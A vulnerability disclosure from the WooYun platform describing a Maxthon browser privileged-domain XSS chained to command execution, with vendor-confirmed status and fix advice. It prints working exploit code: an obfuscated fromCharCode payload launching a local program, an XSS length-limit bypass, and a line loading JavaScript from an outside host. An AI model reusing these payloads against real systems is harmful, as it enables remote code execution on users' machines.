当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140915

漏洞标题:傲游浏览器命令执行漏洞(特权域xss)

相关厂商:傲游

漏洞作者: 隐形人真忙

提交时间:2015-09-13 17:22

修复时间:2015-12-15 13:26

公开时间:2015-12-15 13:26

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-13: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-19: 细节向第三方安全合作伙伴开放
2015-11-10: 细节向核心白帽子及相关领域专家公开
2015-11-20: 细节向普通白帽子公开
2015-11-30: 细节向实习白帽子公开
2015-12-15: 细节向公众公开

简要描述:

傲游浏览器设计存在缺陷,存在特权域XSS,结合API可进行命令执行。

详细说明:

紧跟大牛的步伐挖洞!
-------------------------------
0x00 特权域XSS
-------------------------------
从MxWebkit.dll中发现了一些特权域:

1.png


在查看mx://res/error/danger_site.htm特权域时发现有对URL的处理:

2.png


访问mx://res/error/danger_site.htm?javascript:alert(document.domain),发现支持javascript协议:

3.png


-------------------------------
0x01 漏洞利用
-------------------------------
在特权域中,用户要进行点击触发漏洞,由于新版本的浏览器限制了external中的mxCall函数的调用,所以利用本地域加载特权域,并使用点击劫持的方法进行利用受到了限制。
为了增大用户中招的概率,可以利用maxthon.cn域下的XSS设置含有XSS的特权域为主页。
在maxthon.cn下,都可以对maxthon对象进行调用,从而修改浏览器的一些配置,比如代理、主页、快捷键等等。
设置主页的代码如下:
test.js:

url = "mx://res/error/danger_site.htm?javascript:eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,115,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,115,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,115,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,67,58,47,119,105,110,100,111,119,115,47,115,121,115,116,101,109,51,50,47,99,97,108,99,46,101,120,101,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))";
maxthon.browser.config.ConfigManager.set("maxthon.config","browser.general.startpage",url);


下面缺一个XSS,神器扫:

http://pay.maxthon.cn/bill99.php?gname=maxthon/"><svg/onload=alert(1)>&g_server=maxthon


利用XSS加载外部JS执行主页设置代码,这里的XSS比较坑爹,设置了长度限制,但是可以使用匿名函数的方法执行我们的代码,使用Function(URL)()和\u2028执行超长JS代码:

http://pay.maxthon.cn/bill99.php?gname=maxthon%22/%3E%3Csvg/onload=Function(document.URL)()%3E#【\u2028】var s=document.createElement("script");s.src="http://1.exploitcat.sinaapp.com/test.js";document.body.appendChild(s);


-------------------------------
0x02 效果
-------------------------------
再次打开浏览器,看到带有XSS的特权域页面被设置成为主页,执行命令效果如下:

4.png

漏洞证明:

4.png

修复方案:

1.修复maxthon.cn和特权域的XSS
2.对maxthon对象的访问控制更加细粒度

版权声明:转载请注明来源 隐形人真忙@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-16 13:25

厂商回复:

多谢反馈.

最新状态:

暂无